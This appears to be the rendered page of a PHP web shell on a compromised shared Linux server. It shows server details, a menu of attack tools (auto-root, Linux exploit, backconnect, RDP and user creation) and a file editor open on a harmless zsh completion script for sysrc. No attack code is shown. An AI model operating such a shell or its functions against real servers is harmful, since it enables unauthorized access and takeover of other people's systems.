Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
BSD /
[ HOME SHELL ]
Name
Size
Permission
Action
_bsd_disks
470
B
-rw-r--r--
_bsd_pkg
8.65
KB
-rw-r--r--
_bsdconfig
2.33
KB
-rw-r--r--
_bsdinstall
1.89
KB
-rw-r--r--
_chflags
574
B
-rw-r--r--
_csup
1.1
KB
-rw-r--r--
_cu
2.51
KB
-rw-r--r--
_cvsup
937
B
-rw-r--r--
_fbsd_architectures
142
B
-rw-r--r--
_fbsd_device_types
934
B
-rw-r--r--
_fetch
3.16
KB
-rw-r--r--
_file_flags
1.5
KB
-rw-r--r--
_freebsd-update
1.12
KB
-rw-r--r--
_fstat
530
B
-rw-r--r--
_fw_update
294
B
-rw-r--r--
_gstat
490
B
-rw-r--r--
_jail
2.41
KB
-rw-r--r--
_jails
747
B
-rw-r--r--
_jexec
544
B
-rw-r--r--
_jls
705
B
-rw-r--r--
_jot
2.47
KB
-rw-r--r--
_kld
1
KB
-rw-r--r--
_ldap
2.19
KB
-rw-r--r--
_mixerctl
577
B
-rw-r--r--
_nbsd_architectures
502
B
-rw-r--r--
_obsd_architectures
178
B
-rw-r--r--
_pfctl
4.78
KB
-rw-r--r--
_pkgin
2.59
KB
-rw-r--r--
_portaudit
563
B
-rw-r--r--
_portlint
748
B
-rw-r--r--
_portmaster
3.89
KB
-rw-r--r--
_portsnap
1.03
KB
-rw-r--r--
_powerd
743
B
-rw-r--r--
_procstat
1.03
KB
-rw-r--r--
_rcctl
1.02
KB
-rw-r--r--
_signify
1.37
KB
-rw-r--r--
_sockstat
1.33
KB
-rw-r--r--
_sysrc
2.9
KB
-rw-r--r--
_systat
2.85
KB
-rw-r--r--
_vmctl
2.87
KB
-rw-r--r--
_watch-snoop
396
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _sysrc
#compdef sysrc _sysrc_caching_policy() { local -a oldp oldp=( "$1"(Nm+1) ) (( $#oldp )) } _sysrc() { local curcontext="$curcontext" state line ret=1 typeset -A opt_args local -a rc_conf_vars _arguments -C -s -A '-*' : \ '(-l)-e[print variables as sh(1) compatible syntax]' \ '-E[list only existing files]' \ '(-l)-q[quiet mode]' \ '(-L)-s+[process additional rc.conf.d entries for specified service name]:service name:_services' \ '(-L)*-f+[operate on specified file(s), not \`rc_conf_files'\'']: : _files' \ '(-l)-v[verbose mode]' \ '*:configuration variable:->confvars' \ - set \ '(-A)-a[list all non-default configuration variables]' \ '(-a)-A[list all configuration variables]' \ '-c[check only, return success if vars are set]' \ '-d[print variable(s) description]' \ '-D[print default value(s) only]' \ '-F[print only the last rc.conf(5) file each directive is in]' \ '(- *)-h[print short usage message]' \ '(- *)--help[print full usage message]' \ '-i[ignore unknown variables]' \ '-j+[jail to operate within]:jails:_jails' \ '-n[print only variable values]' \ '-N[print only variable names]' \ '-R+[specify an alternative root]:alternative root:_files -/' \ '(- *)--version[print version information]' \ '-x[remove specified variables from specified file(s)]' \ - lists \ '(-e -q -v)-l[list config files used at startup]' \ - lista \ '(-s -f)-L[list all configuration files including rc.conf.d entries]' && ret=0 if [[ $state == confvars ]]; then local k v opt if (( $+opt_args[lista--L] )); then _services && ret=0 elif compset -P 1 '*='; then case $IPREFIX in *_enable=) _wanted values expl value compadd YES NO && ret=0 ;; *_program=) _files -g "*(-*)" && ret=0 ;; *_interface(|s)=) _net_interfaces && ret=0 ;; *) _message -e values value ;; esac else if zstyle -T ":completion:${curcontext%:*}:values" verbose; then opt=d else opt=N fi if ! zstyle -m ":completion:${curcontext%:*}:values" cache-policy '*'; then zstyle ":completion:${curcontext%:*}:values" cache-policy _sysrc_caching_policy fi if _cache_invalid sysrc/rc_conf_vars || ! _retrieve_cache sysrc/rc_conf_vars; then _call_program sysrc-cmd sysrc -A$opt | while read -r k v; do [[ $k = DEBUG* ]] && continue if [[ -z $v ]]; then rc_conf_vars+=( ${k%:} ) else rc_conf_vars+=( "${k%:}[${${v//]/\\]}//:/\\:}]" ) fi v= done _store_cache sysrc/rc_conf_vars rc_conf_vars fi if (( $#rc_conf_vars )); then if [[ $opt == N ]]; then _values -w variable ${^rc_conf_vars%%\[*}'::value' && ret=0 else _values -w variable ${^rc_conf_vars}'::value' && ret=0 fi fi fi fi return ret } _sysrc "$@"
Close